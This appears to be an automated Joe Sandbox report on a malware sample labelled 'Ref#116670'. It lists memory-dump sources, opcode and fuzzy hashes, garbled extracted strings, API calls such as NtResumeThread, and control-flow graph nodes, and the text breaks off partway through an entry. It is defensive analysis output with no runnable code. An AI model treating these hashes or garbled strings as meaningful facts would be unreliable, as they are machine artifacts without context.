                                                                                                                                  • String ID: PH]q
                                                                                                                                  • API String ID: 0-3168235125
                                                                                                                                  • Opcode ID: 9e7d359f116cb3b48a07cbb3c1b3138ad58727be70f9cb822aefd268b79d6a22
                                                                                                                                  • Instruction ID: 8984aa988cb04c5c063c135b982b26093724e4c3bf88bf18b9dab5f0ba537ca6
                                                                                                                                  • Opcode Fuzzy Hash: 9e7d359f116cb3b48a07cbb3c1b3138ad58727be70f9cb822aefd268b79d6a22
                                                                                                                                  • Instruction Fuzzy Hash: 62D14AB4E04318CFEB64DF69E844BADBBF2FB49300F1080A9D549AB296DB705985CF51
                                                                                                                                  APIs
                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 05CB2896
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: 3d850afc6bd45cf79ff0083e683c1c096550a8dd1946bc30d1bfd40b82ae7d72
                                                                                                                                  • Instruction ID: f7554ca88405153039a00a3d0f0edc1e480d3c4f8ef46c107f95958f120f1c12
                                                                                                                                  • Opcode Fuzzy Hash: 3d850afc6bd45cf79ff0083e683c1c096550a8dd1946bc30d1bfd40b82ae7d72
                                                                                                                                  • Instruction Fuzzy Hash: 5111E4B5D002098EDB10DFAAD485AEEFBF4FF49310F50882AD459A7250CB79A945CFA1
                                                                                                                                  APIs
                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 05CB2896
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: d0871e08c009e5c4f3e644434c03ae6eab4ef7ec20091065f17f6592829b418f
                                                                                                                                  • Instruction ID: 63abf53e085c1517fb475b704420da875c51c7f3dc49ca5a52111d8f3576ecab
                                                                                                                                  • Opcode Fuzzy Hash: d0871e08c009e5c4f3e644434c03ae6eab4ef7ec20091065f17f6592829b418f
                                                                                                                                  • Instruction Fuzzy Hash: 5E1114B5D002098EDB10DFAAD5857EEFBF4FF48310F14882AD459A7240CB79A945CFA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271492048.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6d70000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Ddq
                                                                                                                                  • API String ID: 0-562783569
                                                                                                                                  • Opcode ID: 9f29b2e5647b9c089f66e6ff258561591c5bf166a9b3235e12f249c0221f3302
                                                                                                                                  • Instruction ID: f4541dbffbde448470f6b6c5c2ae47598e65b871ae40a783082ec1171084d608
                                                                                                                                  • Opcode Fuzzy Hash: 9f29b2e5647b9c089f66e6ff258561591c5bf166a9b3235e12f249c0221f3302
                                                                                                                                  • Instruction Fuzzy Hash: F7D1BFB4E00218CFDB54DFA9D994A9DBBF2FF88300F1085A9D419AB365DB30A981CF51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q
                                                                                                                                  • API String ID: 0-52440209
                                                                                                                                  • Opcode ID: a3afe70791edf2c0edd7d6fabfd3f4a853d379fcf866dd5a1b80c58c04976539
                                                                                                                                  • Instruction ID: cefd954de3b18331ec8bd3091e1b9926d0eb3d4a19dffc5904cd5a87970fbe73
                                                                                                                                  • Opcode Fuzzy Hash: a3afe70791edf2c0edd7d6fabfd3f4a853d379fcf866dd5a1b80c58c04976539
                                                                                                                                  • Instruction Fuzzy Hash: D7B104B4E05218CFDB64CFA9D988BADBBF6BF89304F1091A9D149EB251DB705980CF10
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: EE(}
                                                                                                                                  • API String ID: 0-2285280019
                                                                                                                                  • Opcode ID: 11622bf1b95bf6c872b0d2258342c02d045a3eda85ebffb608217c515f3c3547
                                                                                                                                  • Instruction ID: fffb3478076e92f20a9372c553cc8c46275f77daa457c3a3566d18bcef6143e0
                                                                                                                                  • Opcode Fuzzy Hash: 11622bf1b95bf6c872b0d2258342c02d045a3eda85ebffb608217c515f3c3547
                                                                                                                                  • Instruction Fuzzy Hash: B08137B0E052089FDB44DFA9D484AEEBBF6FF88300F14846AE415AB355EB34A945CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: EE(}
                                                                                                                                  • API String ID: 0-2285280019
                                                                                                                                  • Opcode ID: da29ea6d2830a4f4825f65c88e8b99c555f93171a6a2e51b25a07a74ce4c3695
                                                                                                                                  • Instruction ID: 4925aec204afc91fb71bb7c33b518e6495d8016bbb71164ac1e4d51858048e5a
                                                                                                                                  • Opcode Fuzzy Hash: da29ea6d2830a4f4825f65c88e8b99c555f93171a6a2e51b25a07a74ce4c3695
                                                                                                                                  • Instruction Fuzzy Hash: 1A81D6B4E012089FDB44DFA9D584AAEBBF6FF88300F108429E519AB355DB74A945CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 97abf01703f7a43f4d331c9a2001d56b5ee7436f812524a3a112a59f352b6398
                                                                                                                                  • Instruction ID: 6a023fcdfc99ee64af00f426bbba4fbd5a9914ee80878f177a7873af9d0d1c97
                                                                                                                                  • Opcode Fuzzy Hash: 97abf01703f7a43f4d331c9a2001d56b5ee7436f812524a3a112a59f352b6398
                                                                                                                                  • Instruction Fuzzy Hash: 57F12BB4A04218CFEB64EF64E9447EEB7B2EB89300F5081A9D909B7395DB305E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c183844efad1c5b191dde3fec7d775c7276f19844e97b477bb261acbec224a24
                                                                                                                                  • Instruction ID: 9297e7944327cdeb4ac27e358e6cf75a47cfb683230086b0c4df1df957e92342
                                                                                                                                  • Opcode Fuzzy Hash: c183844efad1c5b191dde3fec7d775c7276f19844e97b477bb261acbec224a24
                                                                                                                                  • Instruction Fuzzy Hash: 12D14970E04218CFEB54EFA4E994BADBBF2FF49310F509199D40AAB285CB345985CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c5eee63169e6adacc1b287a00d023d5eda17faf71e690d533d4971fdfcd17c79
                                                                                                                                  • Instruction ID: ad8a96e072a473713bd07d367473a7b76d11e458a2db178923c6693cb2cefb6b
                                                                                                                                  • Opcode Fuzzy Hash: c5eee63169e6adacc1b287a00d023d5eda17faf71e690d533d4971fdfcd17c79
                                                                                                                                  • Instruction Fuzzy Hash: C7D15970E04218CFEB54EFA4E994BADBBF6FF49310F1091A9D40AAB285CB345985CF41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9c94731e0213367a6ff34cae176897c583ae418941846e89a4130d268e787724
                                                                                                                                  • Instruction ID: a18cf92dd77d8d0d1a7689de6762d9ae9814b6251eb838559edcf8af768e5c56
                                                                                                                                  • Opcode Fuzzy Hash: 9c94731e0213367a6ff34cae176897c583ae418941846e89a4130d268e787724
                                                                                                                                  • Instruction Fuzzy Hash: 10C12BB0E05218CFEB54EF69D954BADBBF2BF49300F1494A9D409AB2A1CB345E85CF01
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2c551bf00c7afe2c284f8a68dcf0d022f05e778a4fa3feebe0b2d9e91db6ceb3
                                                                                                                                  • Instruction ID: 094de225f550797f4a14576291707c41244585fcf65d855c4182e71108fb9e01
                                                                                                                                  • Opcode Fuzzy Hash: 2c551bf00c7afe2c284f8a68dcf0d022f05e778a4fa3feebe0b2d9e91db6ceb3
                                                                                                                                  • Instruction Fuzzy Hash: 97C109B0E05218CFEB54EF69E954BADBBF2BF49300F1494A9D509AB2A1CB345D85CF01
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9fd118ebe82a923471e386345ea384646d9764829613867bf5a16e035fef9026
                                                                                                                                  • Instruction ID: f4db5e5039415fc345d20857ba9449411b75bdfcfc102f29c82ceb294d540461
                                                                                                                                  • Opcode Fuzzy Hash: 9fd118ebe82a923471e386345ea384646d9764829613867bf5a16e035fef9026
                                                                                                                                  • Instruction Fuzzy Hash: CBB1EBB4E05218CFEB94EF64D944BADBBF2FB49300F1494A9D409AB2A5CB345E85CF01
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b4f1b054685eeafd66acc441537cca8a0386c0b20a5fcf4e23c1b85944e8f661
                                                                                                                                  • Instruction ID: 218138b08e113eb4689320ddd6d153e0abc53b3d90f9b8e7f3b9e4e3a62e296d
                                                                                                                                  • Opcode Fuzzy Hash: b4f1b054685eeafd66acc441537cca8a0386c0b20a5fcf4e23c1b85944e8f661
                                                                                                                                  • Instruction Fuzzy Hash: A2B1FBB4E05218CFEB54EF68E944BADBBF2BF49300F1494A9D449AB2A1CB345D85CF01
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6620553f295a6237e545b197049490695f786586ff28a49822992b29b1904e65
                                                                                                                                  • Instruction ID: b6d53edf5f730dcc283f45d7d8cc42d223b07590c22248b498270ba26d401fd9
                                                                                                                                  • Opcode Fuzzy Hash: 6620553f295a6237e545b197049490695f786586ff28a49822992b29b1904e65
                                                                                                                                  • Instruction Fuzzy Hash: ADB10AB4E05218CFEB54EF68E944BADBBF2BF49300F1494A9D549AB2A1CB345D85CF01
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 346f0ea6afdde72ed30f9913dbe0c09d7896d514eebf5d549d888c7c9677cfe9
                                                                                                                                  • Instruction ID: 4bb1fe38f3b470931c3c1ca29a9d214bb1b3e8f107dfefff8bcd6fc41b080ab4
                                                                                                                                  • Opcode Fuzzy Hash: 346f0ea6afdde72ed30f9913dbe0c09d7896d514eebf5d549d888c7c9677cfe9
                                                                                                                                  • Instruction Fuzzy Hash: BAA1E3B0E05218CFDB54DF69D944BAEB7B2FB89300F1085A9D109AB295DB345E85CF20
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 27ca620f5486ee259d10b8063489e7612acc9c3fce6b9401dbeb61d3f6b841e9
                                                                                                                                  • Instruction ID: f8387c28f3d3e847f3728f2f1c7d98f802545e973562bc2b7d546b16e9538dcb
                                                                                                                                  • Opcode Fuzzy Hash: 27ca620f5486ee259d10b8063489e7612acc9c3fce6b9401dbeb61d3f6b841e9
                                                                                                                                  • Instruction Fuzzy Hash: 16A1F2B4E05218CFDB54EF69D984BAEB7F2FB89300F1080A9D509AB255DB345E85CF60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5cca898645e22e77382aa2c361b02a40717822811c421c82238b824c24e07964
                                                                                                                                  • Instruction ID: 54fc265822f77c1820fac7110d4db4277fbbfb856a0ccf3603c4f1f6ebe4758b
                                                                                                                                  • Opcode Fuzzy Hash: 5cca898645e22e77382aa2c361b02a40717822811c421c82238b824c24e07964
                                                                                                                                  • Instruction Fuzzy Hash: 84913570E05218DFEB64CF79D885BADBBF2BB4A304F1091AAD048EB265DB745981CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 84e59d8e9ce4e90231e8a9f7ad582bdd14a5d0b63f17ef1483459d1c480875f8
                                                                                                                                  • Instruction ID: eccbcf52473c7d84f8e33924ebf7bd43be1b45494123bd894f02639404835c3f
                                                                                                                                  • Opcode Fuzzy Hash: 84e59d8e9ce4e90231e8a9f7ad582bdd14a5d0b63f17ef1483459d1c480875f8
                                                                                                                                  • Instruction Fuzzy Hash: CD91F2B0E05208CFDB54DFA9E984BADBBF2BF49300F14942AD509E7255DB359986CF20
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a86c61901db8f7d088953d751caae439360961e7fc2e190fc3850ab5bd44187c
                                                                                                                                  • Instruction ID: 92dbd1979f59f5c3da91852edc8d946f2638e6533fb7f0e2092e0945b8e4903a
                                                                                                                                  • Opcode Fuzzy Hash: a86c61901db8f7d088953d751caae439360961e7fc2e190fc3850ab5bd44187c
                                                                                                                                  • Instruction Fuzzy Hash: 7F91F3B0D09208CFDB54DFAAE584BADBBF2BF49300F14942AD509E7255DB359986CF20

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1160 245db40-245dbcf GetCurrentProcess 1164 245dbd1-245dbd7 1160->1164 1165 245dbd8-245dc0c GetCurrentThread 1160->1165 1164->1165 1166 245dc15-245dc49 GetCurrentProcess 1165->1166 1167 245dc0e-245dc14 1165->1167 1168 245dc52-245dc6a 1166->1168 1169 245dc4b-245dc51 1166->1169 1167->1166 1173 245dc73-245dca2 GetCurrentThreadId 1168->1173 1169->1168 1174 245dca4-245dcaa 1173->1174 1175 245dcab-245dd0d 1173->1175 1174->1175
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0245DBBE
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0245DBFB
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0245DC38
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0245DC91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2250151688.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2450000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                  • Opcode ID: 9c47183a5c261ce2095bd120bac5ea02d2135cb2077d8bb9882f8c5a70b7b542
                                                                                                                                  • Instruction ID: 7a1938a27d5849d5bab5afa0ab325b0706198c79ee3c23caca68c92e7122731a
                                                                                                                                  • Opcode Fuzzy Hash: 9c47183a5c261ce2095bd120bac5ea02d2135cb2077d8bb9882f8c5a70b7b542
                                                                                                                                  • Instruction Fuzzy Hash: 2A5185B0D01209CFDB14DFA9C648BAEBBF1FF88304F24845AE449A7361C774A984CB65

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1351 6a1b9a8-6a1b9d0 1353 6a1b9d2-6a1ba19 1351->1353 1354 6a1ba1e-6a1ba2c 1351->1354 1403 6a1be75-6a1be7c 1353->1403 1355 6a1ba3b 1354->1355 1356 6a1ba2e-6a1ba39 call 6a198d0 1354->1356 1359 6a1ba3d-6a1ba44 1355->1359 1356->1359 1361 6a1ba4a-6a1ba4e 1359->1361 1362 6a1bb2d-6a1bb31 1359->1362 1363 6a1ba54-6a1ba58 1361->1363 1364 6a1be7d-6a1bea5 1361->1364 1366 6a1bb33-6a1bb42 call 6a176e0 1362->1366 1367 6a1bb87-6a1bb91 1362->1367 1368 6a1ba6a-6a1bac8 call 6a19610 call 6a1a078 1363->1368 1369 6a1ba5a-6a1ba64 1363->1369 1373 6a1beac-6a1bed6 1364->1373 1381 6a1bb46-6a1bb4b 1366->1381 1370 6a1bb93-6a1bba2 call 6a16e98 1367->1370 1371 6a1bbca-6a1bbf0 1367->1371 1413 6a1bf3b-6a1bf65 1368->1413 1414 6a1bace-6a1bb28 1368->1414 1369->1368 1369->1373 1386 6a1bba8-6a1bbc5 1370->1386 1387 6a1bede-6a1bef4 1370->1387 1392 6a1bbf2-6a1bbfb 1371->1392 1393 6a1bbfd 1371->1393 1373->1387 1388 6a1bb44 1381->1388 1389 6a1bb4d-6a1bb82 call 6a1b878 1381->1389 1386->1403 1411 6a1befc-6a1bf34 1387->1411 1388->1381 1389->1403 1401 6a1bbff-6a1bc27 1392->1401 1393->1401 1417 6a1bcf8-6a1bcfc 1401->1417 1418 6a1bc2d-6a1bc3b 1401->1418 1411->1413 1423 6a1bf67-6a1bf6d 1413->1423 1424 6a1bf6f-6a1bf75 1413->1424 1414->1403 1421 6a1bd76-6a1bd80 1417->1421 1422 6a1bcfe-6a1bd17 1417->1422 1438 6a1bc44-6a1bc46 1418->1438 1427 6a1bd82-6a1bd8c 1421->1427 1428 6a1bddd-6a1bde6 1421->1428 1422->1421 1449 6a1bd19-6a1bd28 call 6a16cc0 1422->1449 1423->1424 1425 6a1bf76-6a1bfb3 1423->1425 1444 6a1bd92-6a1bda4 1427->1444 1445 6a1bd8e-6a1bd90 1427->1445 1432 6a1bde8-6a1be16 call 6a18e20 call 6a18e40 1428->1432 1433 6a1be1e-6a1be6b 1428->1433 1432->1433 1457 6a1be73 1433->1457 1438->1417 1446 6a1bc4c-6a1bc5b call 6a16cc0 1438->1446 1450 6a1bda6-6a1bda8 1444->1450 1445->1450 1460 6a1bc73-6a1bc88 1446->1460 1461 6a1bc5d-6a1bc63 1446->1461 1475 6a1bd40-6a1bd4b 1449->1475 1476 6a1bd2a-6a1bd30 1449->1476 1454 6a1bdd6-6a1bddb 1450->1454 1455 6a1bdaa-6a1bdae 1450->1455 1454->1427 1454->1428 1464 6a1bdb0-6a1bdc9 1455->1464 1465 6a1bdcc-6a1bdd1 call 6a15ac0 1455->1465 1457->1403 1471 6a1bc8a-6a1bcb6 call 6a17f70 1460->1471 1472 6a1bcbc-6a1bcc5 1460->1472 1467 6a1bc65 1461->1467 1468 6a1bc67-6a1bc69 1461->1468 1464->1465 1465->1454 1467->1460 1468->1460 1471->1411 1471->1472 1472->1413 1480 6a1bccb-6a1bcf2 1472->1480 1475->1413 1477 6a1bd51-6a1bd74 1475->1477 1481 6a1bd32 1476->1481 1482 6a1bd34-6a1bd36 1476->1482 1477->1421 1477->1449 1480->1417 1480->1446 1481->1475 1482->1475
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Haq$Haq$Haq
                                                                                                                                  • API String ID: 0-3013282719
                                                                                                                                  • Opcode ID: 01cccce533b42cb7600c1a0157ce7ad3baba7f70f033f4a3044fe3c47668649d
                                                                                                                                  • Instruction ID: 9276b8df52d31583f9ea73b777ad4d8b5e9937cd453d0fbebcbc0c131cb0c079
                                                                                                                                  • Opcode Fuzzy Hash: 01cccce533b42cb7600c1a0157ce7ad3baba7f70f033f4a3044fe3c47668649d
                                                                                                                                  • Instruction Fuzzy Hash: A7125D30A002049FCB54EFA5C894AAEBBF2FF88310B14856DE5169F755DB35ED46CB90

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1493 6a1d660-6a1d69d 1495 6a1d6bf-6a1d6d5 call 6a1d468 1493->1495 1496 6a1d69f-6a1d6a2 1493->1496 1502 6a1da4b-6a1da5f 1495->1502 1503 6a1d6db-6a1d6e7 1495->1503 1607 6a1d6a4 call 6a1dfd0 1496->1607 1608 6a1d6a4 call 6a1df68 1496->1608 1499 6a1d6aa-6a1d6ac 1499->1495 1500 6a1d6ae-6a1d6b6 1499->1500 1500->1495 1514 6a1da9f-6a1daa8 1502->1514 1504 6a1d818-6a1d81f 1503->1504 1505 6a1d6ed-6a1d6f0 1503->1505 1508 6a1d825-6a1d82e 1504->1508 1509 6a1d94e-6a1da0b call 6a1ce70 call 6a1fe00 call 6a1ce70 call 6a1fe00 1504->1509 1506 6a1d6f3-6a1d6fc 1505->1506 1512 6a1db40 1506->1512 1513 6a1d702-6a1d716 1506->1513 1508->1509 1510 6a1d834-6a1d940 call 6a1ce70 call 6a1d400 call 6a1ce70 1508->1510 1587 6a1da11-6a1da42 1509->1587 1605 6a1d942 1510->1605 1606 6a1d94b 1510->1606 1521 6a1db45-6a1db49 1512->1521 1530 6a1d808-6a1d812 1513->1530 1531 6a1d71c-6a1d7b1 call 6a1d468 * 2 call 6a1ce70 call 6a1d400 call 6a1d4a8 call 6a1d550 call 6a1d5b8 1513->1531 1515 6a1daaa-6a1dab1 1514->1515 1516 6a1da6d-6a1da76 1514->1516 1519 6a1dab3-6a1daf6 call 6a1ce70 1515->1519 1520 6a1daff-6a1db06 1515->1520 1516->1512 1523 6a1da7c-6a1da8e 1516->1523 1519->1520 1524 6a1db08-6a1db18 1520->1524 1525 6a1db2b-6a1db3e 1520->1525 1528 6a1db54 1521->1528 1529 6a1db4b 1521->1529 1540 6a1da90-6a1da98 call 6acfbd8 1523->1540 1541 6a1da9e 1523->1541 1524->1525 1542 6a1db1a-6a1db22 1524->1542 1525->1521 1539 6a1db55 1528->1539 1529->1528 1530->1504 1530->1506 1584 6a1d7d0-6a1d803 call 6a1d5b8 1531->1584 1585 6a1d7b3-6a1d7cb call 6a1d550 call 6a1ce70 call 6a1d120 1531->1585 1539->1539 1540->1541 1541->1514 1542->1525 1584->1530 1585->1584 1587->1502 1605->1606 1606->1509 1607->1499 1608->1499
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q$4']q
                                                                                                                                  • API String ID: 0-705557208
                                                                                                                                  • Opcode ID: 7d0cedea73d768722191aea47f1f05e85e3d2472ff6f28532e862764b35f7667
                                                                                                                                  • Instruction ID: d94da3c460941e7614eea2433aa0081397d4dcca05eb3c4f69d1ed0640340a1b
                                                                                                                                  • Opcode Fuzzy Hash: 7d0cedea73d768722191aea47f1f05e85e3d2472ff6f28532e862764b35f7667
                                                                                                                                  • Instruction Fuzzy Hash: 2BF1C934A10218DFCB44EFA4D994A9DBBB2FF89310F118158E506AB3A5DB75EC42CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270678838.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6890000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: e8546bdc5c01acb554059d975c760f81c3b19ce4295d06402a5f61641f02a3c0
